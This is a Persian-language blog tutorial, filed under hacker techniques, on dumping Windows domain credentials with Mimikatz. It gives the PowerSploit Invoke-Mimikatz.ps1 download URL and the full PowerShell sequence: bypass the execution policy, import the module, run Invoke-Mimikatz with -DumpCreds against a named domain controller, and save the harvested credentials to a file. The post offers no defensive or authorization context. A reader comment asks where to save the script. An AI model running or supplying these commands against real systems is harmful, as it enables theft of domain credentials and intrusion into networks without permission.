استخراج اعتبارنامه های ویندوز با ابزار mimikatz

منتشر شده در دسته : راهکارهای هکر

استخراج اعتبارنامه های ویندوز با ابزار mimikatz چگونه انجام می شود ؟ اسکریپت دیگری وجود دارد که با استفاده از آن می‌توانیم اعتبارنامه های یک شبکه دامین را که به آن دسترسی داریم استخراج کنیم .

استخراج اعتبارنامه های ویندوز با ابزار mimikatz

در آزمایش زیر از mimikatz استفاده می‌کنیم . به این منظور ابتدا به آدرس زیر رفته و فایل اسکریپت پاورشل را دانلود کنید و در سیستم در محلی مشخص ذخیره می‌کنیم :

https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

سپس دستورات زیر را وارد کنید :

powershell.exe -Nop -Exec Bypass
Import-Module c:\scripts\mimikatz.ps1
Invoke-Mimikatz -ComputerName dc.netamooz.net -DumpCreds | Out-File C:\scripts\output-mimi.txt
type C:\scripts\output-mimi.txt

استخراج اعتبارنامه های ویندوز با ابزار mimikatz

در دستورهای بالا ابتدا پاورشل را بدون محدودیت اجرا می‌کنیم .
سپس اسکریپت ماژول را وارد پاورشل را وارد کنید .
با استفاده از کامندلت Invoke-Mimikatz دامین مورد نظر را انتخاب و اعتبارنامه های موجود را استخراج و درون فایلی متنی ذخیره می‌کنیم .
سپس محتویات فایل ایجاد شده که اعتبارنامه های ما می‌باشد را نمایش می‌دهیم .

یک دیدگاه

  1. سلام ببخشید من واردادرس زیر شدم اسکریپ قابل دانلودی وجود نداشت فقط یه صفحه اومدکه متن بود من منت ها کپی کردم داخل یه فایل تکتس وبهps1فرمتش رو تغییر دادم اما نگفتین اون محلی مشخص که باید ذخیره کنیم کجاست تا اسکریپت اجرا بشه!

خوشحال می شویم دیدگاههای خود را در میان بگذارید * فرصت پاسخگویی به سوالات در بلاگ وجود ندارد

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *